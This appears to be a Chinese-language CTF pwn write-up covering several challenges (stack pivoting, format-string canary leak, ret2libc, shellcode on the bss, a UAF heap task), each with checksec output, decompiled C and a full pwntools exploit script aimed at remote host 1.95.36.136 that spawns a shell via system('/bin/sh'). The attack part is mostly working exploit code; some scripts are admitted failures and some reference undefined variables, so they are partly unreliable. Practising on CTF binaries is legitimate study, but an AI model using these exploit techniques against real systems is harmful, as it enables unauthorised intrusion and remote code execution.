1 2 3 4 5 6 7 8 9 10 int vuln () { int buf[11 ]; memset (buf, 0 , 40 ); read (0 , buf, 0x38u ); printf ("%s" , buf); read (0 , buf, 0x38u ); return printf ("%s" , buf); }
显而易见了
日常检查一下
1 2 3 4 5 6 7 8 9 llq@llq-virtual-machine:~$ checksec pwn [*] '/home/llq/pwn' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) Stripped: No llq@llq-virtual-machine:~$
这里没有/bin/sh
应该还是迁移到栈上
找一下buf栈顶到ebp的距离
1 2 Python>0xffab8268-0xffab8228 0x40
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='i386' ,log_level='debug' ) elf=ELF('./1111' ) p=remote('1.95.36.136' , 2123 ) payload=b'a' *0x2f +b'b' s(payload) rl("b" ) rsp=ebp=u32(p.recv(4 ))- 0x40 pr(hex (rsp)) sys=0x080483e0 ret_addr= 0x0804838a leave_ret=0x08048488 payload1=b'aaaa' +p32(sys)+p32(ret_addr)+p32(rsp+0x10 )+b"/bin/sh" payload1=payload1.ljust(0x30 ,b'\x00' ) payload1+=p32(rsp)+p32(leave_ret) s(payload1) inter()
choose-找不到libc版本 2024.11.4
日常检查一下
1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec pwn2 [*] '/home/bbq/pwn2' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) bbq@ubuntu:~$
丢进ida里面看看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 int __fastcall __noreturn main (int argc, const char **argv, const char **envp) { setvbuf (stdout, 0LL , 2 , 0LL ); setvbuf (stderr, 0LL , 2 , 0LL ); puts ("Welcome to the PolarNight August CTF!\nLet go!" ); while ( 1 ) { menu (); choose (); } } int menu () { puts ("Choose ur challenge:" ); puts ("1.Format" ); puts ("2.Leak Libc" ); return puts ("3.Buf overflow" ); } unsigned __int64 choose () { int v1; unsigned __int64 v2; v2 = __readfsqword(0x28u ); v1 = 0 ; __isoc99_scanf("%d" , &v1); switch ( v1 ) { case 1 : format(); break ; case 2 : leaklibc (); break ; case 3 : overflow (); break ; } return __readfsqword(0x28u ) ^ v2; } unsigned __int64 format () { __int64 buf[5 ]; unsigned __int64 v2; v2 = __readfsqword(0x28u ); memset (buf, 0 , sizeof (buf)); read (0 , buf, 0x28uLL ); printf ((const char *)buf); return __readfsqword(0x28u ) ^ v2; } unsigned __int64 leaklibc () { int v0; __int64 buf[3 ]; int v3; __int16 v4; unsigned __int64 v5; v5 = __readfsqword(0x28u ); memset (buf, 0 , sizeof (buf)); v3 = 0 ; v4 = 0 ; read (0 , buf, 0x1EuLL ); v0 = atoi ((const char *)buf); puts ((const char *)v0); return __readfsqword(0x28u ) ^ v5; } unsigned __int64 overflow () { __int64 buf[5 ]; unsigned __int64 v2; v2 = __readfsqword(0x28u ); memset (buf, 0 , sizeof (buf)); read (0 , buf, 0x50uLL ); return __readfsqword(0x28u ) ^ v2; }
看也看出来了
选择一泄露canary,选择2泄露libc基址,选择三正常打栈溢出
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6' ) elf=ELF('./pwn2' ) p = process('./pwn2' ) rla('flow\n' ,b'1' ) payload2='%7$p' io.sendlineafter("Right on! So do you know what a canary is?" ,payload2) io.recv() canary=int (io.recv(18 ),16 ) pr(hex (canary)) inter()
可以看出偏移为6这回我们可以泄露一下canary的值了
fmt泄露canary 每次做题都得翻一下笔记,so准备详细记一下
第一步:确定偏移
知道偏移是六。
第二步:确认canary距离我们输入rsp的距离
gdb运行
1 2 3 4 gdb pwn2 b main(b *运行到read输入的地址) r stack 20
地址减一下
1 2 Python>0x7fffffffde48 -0x7fffffffde20 0x28
但这里我想直接在ida里面看一下会更简单
首先看一下汇编代码找到canary的位置
在看一下栈的位置
最后:确定最终字节
除以8字节,为5,得到5+6=11
然后就可以正常泄露了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6' ) elf=ELF('./pwn2' ) p=remote('1.95.36.136' ,2086 ) sla('flow\n' ,b'1' ) payload2='%11$p' s(payload2) canary=int (p.recv(18 ),16 ) pr(hex (canary)) sla('flow\n' ,'2' ) pop_rdi=0x0000000000400a93 ret_addr=0x00000000004005f1 puts_got = elf.got['puts' ] pay1 = p64(puts_got) s(str (puts_got)) puts_addr=get_addr64() libc = LibcSearcher("puts" ,puts_addr) libc_base = puts_addr - libc.dump("puts" ) sys_addr = libc_base+libc.dump("system" ) bin_addr = libc_base+libc.dump("str_bin_sh" ) ''' libc_base=puts_addr-libc.sym['puts'] pr(hex(libc_base)) system_addr,bin_sh=get_sb() ''' sla('flow\n' ,b'3' ) payload=b'a' *(0x30 -8 )+p64(canary)+b'a' *8 +p64(pop_rdi)+p64(bin_addr)+p64(sys_addr) s(payload) inter()
不到为什么,还是打不通了
格式化 2024.11.5
简单检查一下
1 2 3 4 5 6 7 8 9 10 bbq@ubuntu:~$ checksec 1111 [*] '/home/bbq/1111' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Executable RWX: Has RWX segments bbq@ubuntu:~$
看着不难
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 int __fastcall main (int argc, const char **argv, const char **envp) { char format[200 ]; unsigned __int64 v5; v5 = __readfsqword(0x28u ); setvbuf (stdin, 0LL , 2 , 0LL ); setvbuf (stdout, 0LL , 2 , 0LL ); setvbuf (stderr, 0LL , 2 , 0LL ); gets (format); printf (format); gets (format); printf (format); return 0 ; }
看着不难
应该就是第一个gets泄露canary第二个gets打栈溢出
首先找一下偏移
知道偏移为6后
找一下canary距离栈的位置就行
确定为25+6=31
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6' ) elf=ELF('./1111' ) p=remote('1.95.36.136' , 2086 ) payload1=b'%31$p' sl(payload1) canary=int (p.recv(18 ),16 ) pr(hex (canary)) backdoor=0x000000000400805 payload2=b'a' *(0xd0 -8 )+p64(canary)+p64(0xdeabeef )+p64(backdoor) sl(payload2) inter()
ret2libc-找不到libc版本 2024.11.6
1 2 3 4 5 6 7 8 9 10 bbq@ubuntu:~$ checksec ret2libc [*] '/home/bbq/ret2libc' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Executable RWX: Has RWX segments bbq@ubuntu:~$
丢进ida里面看看
很基础哈
没啥说的
1 2 3 4 5 6 7 8 9 10 11 int __fastcall main (int argc, const char **argv, const char **envp) { char s[112 ]; setvbuf (stdin, 0LL , 2 , 0LL ); setvbuf (stdout, 0LL , 2 , 0LL ); setvbuf (stderr, 0LL , 2 , 0LL ); gets (s); puts (s); return 0 ; }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 from pwn import *from struct import packimport ctypesfrom LibcSearcher import *def bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6' ) elf=ELF('./ret2libc' ) p=remote('1.95.36.136' , 2084 ) pop_rdi=0x0000000000400753 ret_addr=0x0000000000400509 payload=b'a' *(0x70 +8 )+p64(pop_rdi)+p64(elf.got['puts' ])+p64(elf.plt['puts' ])+p64(elf.sym['main' ]) sl(payload) puts_addr=get_addr64() pr(hex (puts_addr)) ''' libc_base=puts_addr-libc.sym['puts'] pr(hex(libc_base)) system_addr,bin_sh=get_sb() ''' libc = LibcSearcher("puts" ,puts_addr) libc_base = puts_addr - libc.dump("puts" ) pr(hex (libc_base)) system_addr = libc_base+libc.dump("system" ) bin_sh = libc_base+libc.dump("str_bin_sh" ) payload2= flat([b'a' *(0x70 +8 ),ret_addr,pop_rdi,bin_sh,system_addr]) sl(payload2) inter()
本地能打通,远程通不了,基址也是对的,环境问题吧 跟上面那道差不多一个问题
Choice 没啥说的简单的后门
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 int __fastcall main (int argc, const char **argv, const char **envp) { int v4; init (argc, argv, envp); puts ("请输入要进行的操作(数字):" ); puts ("Menu:" ); puts ("1.新增数据:" ); puts ("2.删除数据:" ); puts ("3.查询数据:" ); __isoc99_scanf("%d" , &v4); if ( v4 == 1 ) { Data1 (); } else if ( v4 == 2 ) { Data2 (); } else { Data3 (); } return 0 ; } int Data1 () { char buf[48 ]; puts ("请输入新增数据的名字:" ); read (0 , buf, 0x35uLL ); return printf ("输入完成!" ); } int Data2 () { char buf[48 ]; puts ("请输入要删除数据的名字:" ); read (0 , buf, 0x35uLL ); return printf ("输入完成!" ); } int Data3 () { char buf[48 ]; puts ("请输入要查询数据的名字:" ); read (0 , buf, 0x50uLL ); return printf ("输入完成!" ); }
选三就行,正常的栈溢出
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 from pwn import *from struct import packimport ctypesfrom LibcSearcher import *def bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6' ) elf=ELF('./Choice' ) p = process('./Choice' ) backdoor=0x0000000004007BD sla('查询数据:\n' ,b'3' ) payload=b'a' *(0x30 +8 )+p64(backdoor) s(payload) inter()
x64 日常检查
1 2 3 4 5 6 7 8 9 10 bbq@ubuntu:~$ checksec x64 [*] '/home/bbq/x64' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Executable RWX: Has RWX segments bbq@ubuntu:~$
没啥说的,直接ROP链
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from pwn import *p=remote('1.95.36.136' , 2085 ) elf=ELF('x64' ) pop_rdi=0x00000000004007e3 ret_addr=0x0000000000400549 sh_addr=0x000000000601060 system_addr=0x000000000400560 payload=b'a' *(0x80 +8 )+p64(ret_addr)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr) p.send(payload) p.interactive()
你是大佬还是菜鸡 日常检查
1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec pwn [*] '/home/bbq/pwn' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) bbq@ubuntu:~$
一样
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from pwn import *p=remote(' 1.95.36.136' , 2105 ) elf=ELF('pwn' ) pop_rdi=0x0000000000400933 ret_addr=0x0000000000400549 bin_sh=0x0000000004009A9 system_addr=0x000000000400600 payload=b'a' *(0x80 +8 )+p64(ret_addr)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr) p.send(payload) p.interactive()
play 2024.11.6
日常检查
1 2 3 4 5 6 7 8 9 10 bbq@ubuntu:~$ checksec play [*] '/home/bbq/play' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Executable RWX: Has RWX segments bbq@ubuntu:~$
看了一眼主函数
1 2 3 4 5 6 7 8 9 10 __int64 play () { char v1[48 ]; puts ("I think you must enjoy playing." ); read (0 , &buf, 0x64uLL ); puts ("Name your favorite game?" ); gets (v1); return 0LL ; }
前面的buf实在bss段上的,so就是shellcode的无疑了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 from pwn import *p = remote('1.95.36.136' , 2092 ) context(os='linux' ,arch='amd64' ,log_level='debug' ) shellcode = asm(shellcraft.sh()) buf_addr = 0x0000000006010A0 p.sendlineafter('playing.\n' ,shellcode) payload1=b'a' *(0x30 +8 )+p64(buf_addr) p.sendline(payload1) p.interactive()
name4 日常检查
1 2 3 4 5 6 7 8 9 10 bbq@ubuntu:~$ checksec name4 [*] '/home/bbq/name4' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x8048000) Stack: Executable RWX: Has RWX segments bbq@ubuntu:~$
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 int Start () { char s[20 ]; int v2; v2 = 0 ; puts ("Enter your name:" ); read (0 , name, 0x40u ); puts ("Enter your best friend name:" ); read (0 , &::s, 0x40u ); if ( name[0 ] ) return write (1 , "Are you OK?" , 0xEu ); puts ("give you stack overflow:" ); gets (s); return printf ("byebye%s\n" , name); }
看着if条件语句是一个绕过
我们用空字符绕过一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 from pwn import *p = remote('1.95.36.136' , 2084 ) context(os='linux' ,arch='amd64' ,log_level='debug' ) elf=ELF('./name4' ) libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so' ) p.sendlineafter('your name:\n' ,b'\x00' ) p.sendlineafter('friend name:\n' ,b'\x00' ) payload=b'a' *(0x20 +4 )+ p32(elf.plt['puts' ]) + p32(0x80485F1 ) + p32(elf.got['puts' ]) p.sendline(payload) puts_addr=u32(p.recvuntil("\xf7" )[-4 :]) print (hex (puts_addr))libc_base = puts_addr - libc.sym["puts" ] print (hex (libc_base))system_addr=libc_base+libc.sym['system' ] bin_sh=libc_base+libc.search(b"/bin/sh\x00" ).__next__() ''' libc = LibcSearcher("puts",puts_addr) libc_base = puts_addr - libc.dump("puts") print(hex(libc_base)) system_addr = libc_base+libc.dump("system") bin_sh = libc_base+libc.dump("str_bin_sh") ''' p.sendlineafter('your name:\n' ,b'\x00' ) p.sendlineafter('friend name:\n' ,b'\x00' ) payload1 =b'A' *(0x20 +4 )+p32(system_addr)+b'AAAA' +p32(bin_sh) p.sendline(payload1) p.interactive()
md,这个libcsearch没找到,得自己找
sleep-找不到libc版本 跟上面做法差不多
直接贴脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 from pwn import *p = remote('1.95.36.136' , 2084 ) context(os='linux' ,arch='amd64' ,log_level='debug' ) elf=ELF('./name4' ) libc=ELF('./libc6-i386_2.23-0ubuntu11.3_amd64.so' ) p.sendlineafter('your name:\n' ,b'\x00' ) p.sendlineafter('friend name:\n' ,b'\x00' ) payload=b'a' *(0x20 +4 )+ p32(elf.plt['puts' ]) + p32(0x80485F1 ) + p32(elf.got['puts' ]) p.sendline(payload) puts_addr=u32(p.recvuntil("\xf7" )[-4 :]) print (hex (puts_addr))libc_base = puts_addr - libc.sym["puts" ] print (hex (libc_base))system_addr=libc_base+libc.sym['system' ] bin_sh=libc_base+libc.search(b"/bin/sh\x00" ).__next__() ''' libc = LibcSearcher("puts",puts_addr) libc_base = puts_addr - libc.dump("puts") print(hex(libc_base)) system_addr = libc_base+libc.dump("system") bin_sh = libc_base+libc.dump("str_bin_sh") ''' p.sendlineafter('your name:\n' ,b'\x00' ) p.sendlineafter('friend name:\n' ,b'\x00' ) payload1 =b'A' *(0x20 +4 )+p32(system_addr)+b'AAAA' +p32(bin_sh) p.sendline(payload1) p.interactive()
远程环境的问题
stack_pivotingx86 栈迁移
日常检查一下
1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec 1111 [*] '/home/bbq/1111' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) bbq@ubuntu:~$
1 2 3 4 5 6 7 8 9 10 11 12 ssize_t vuln () { char buf[40 ]; write (1 , "Welcome to CTF_STACK world\n" , 0x1Bu ); write (1 , "Please input your name:\n" , 0x18u ); read (0 , buf, 0x30u ); write (1 , "Hello " , 6u ); puts (buf); write (1 , "Would you like tell me some message:\n" , 0x25u ); return read (0 , buf, 0x30u ); }
就是不到为什么会有两次read
题目system和/bin/sh地址都在
不用泄露基址哇
因为我们不知道栈顶的位置
so我们要通过第一个read策一下距离
x/5xw $esp
查看寄存器值
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6' ) elf=ELF('./1111' ) p=remote('1.95.36.136' , 2119 ) leave_addr=0x8048666 system_addr=0x8048420 bin_sh=0x804A030 rl('your name:\n' ) payload1=b'a' *(0x28 -1 )+b'b' s(payload1) rl('b' ) esp=u32(p.recv(4 ))-0x38 pr(hex (esp)) rl('message:\n' ) payload=b'aaaa' +p32(system_addr)+b'AAAA' +p32(bin_sh) payload=payload.ljust(0x28 ,b'\x00' ) payload+=p32(esp)+p32(leave_addr) s(payload) inter()
踩坑点:注意esp距离ebp的长度
相减得到0x38
夕阳下的舞者-未做出 日常检查
1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec 1111 [*] '/home/bbq/1111' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled bbq@ubuntu:~$
感觉是上难度了
嘶
果然是堆题
这回是直接干
看一眼题wp说是有个换libc环境
1 2 patchelf --replace-needed libc.so.6 ./libc-2.23.so ./562+5Liq5Yiw patchelf --set-interpreter ./ld-2.23.so ./562+5Liq5Yiw
但是我是直接跑起来了
heap_Easy_Uaf 2024.11.12
既然是堆题,并且连漏洞都告诉你了
就好好找一下吧
1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec 1111 [*] '/home/bbq/1111' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) bbq@ubuntu:~$
其实说实话,如果说是堆题的话,这个保护机制还有利用的必要吗???
先找一下漏洞吧
既然是UAF漏洞
uaf漏洞通常就是内存块被释放后,其对应的指针没有被置为NUL
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) elf=ELF('./1111' ) p=remote('1.95.36.136' , 2107 ) rl('Please Choice!' ) sl(str (5 )) rl('size :' ) sl(str (0x68 )) rl('Content : ' ) sl(b'Flag' ) inter()
05ret2libc_64 2024.11.12
不用看了直接写吧
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 from pwn import *from struct import packimport ctypesfrom LibcSearcher import *def bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6' ) elf=ELF('./1111' ) p=remote('1.95.36.136' , 2084 ) pop_rdi=0x0000000000400753 ret_addr=0x0000000000400509 payload=b'a' *(0x70 +8 )+p64(pop_rdi)+p64(elf.got['puts' ])+p64(elf.plt['puts' ])+p64(elf.sym['main' ]) sl(payload) puts_addr=get_addr64() pr(hex (puts_addr)) ''' libc_base=puts_addr-libc.sym['puts'] pr(hex(libc_base)) system_addr,bin_sh=get_sb() ''' libc = LibcSearcher("puts" ,puts_addr) libc_base = puts_addr - libc.dump("puts" ) pr(hex (libc_base)) system_addr = libc_base+libc.dump("system" ) bin_sh = libc_base+libc.dump("str_bin_sh" ) payload2= flat([b'a' *(0x70 +8 ),ret_addr,pop_rdi,bin_sh,system_addr]) sl(payload2) inter()
做不出来的最大问题就是libc环境问题
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 from pwn import * context(arch='amd64' , os='linux' , log_level='debug' ) io = remote('1.95.36.136' , 2086 ) elf = ELF('./1111' ) pop_rdi_ret = 0x400843 ret_addr = 0x400581 puts_plt = elf.plt['puts' ] puts_got = elf.got['puts' ] main_addr = elf.sym['main' ] payload = b'a' * 0x100 + b'b' * 8 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main_addr) io.sendlineafter('question:\n' , payload) puts_addr = u64(io.recvuntil(b'\x7f' )[-6 :].ljust(8 , b'\x00' )) print ('puts_addr=' , hex (puts_addr)) libc_base = puts_addr - 0x06f6a0 print (hex (libc_base))system_addr = libc_base + 0x0453a0 bin_sh_addr = libc_base + 0x18ce57 payload = b'a' * 0x100 + b'b' * 8 + p64(ret_addr) + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr) 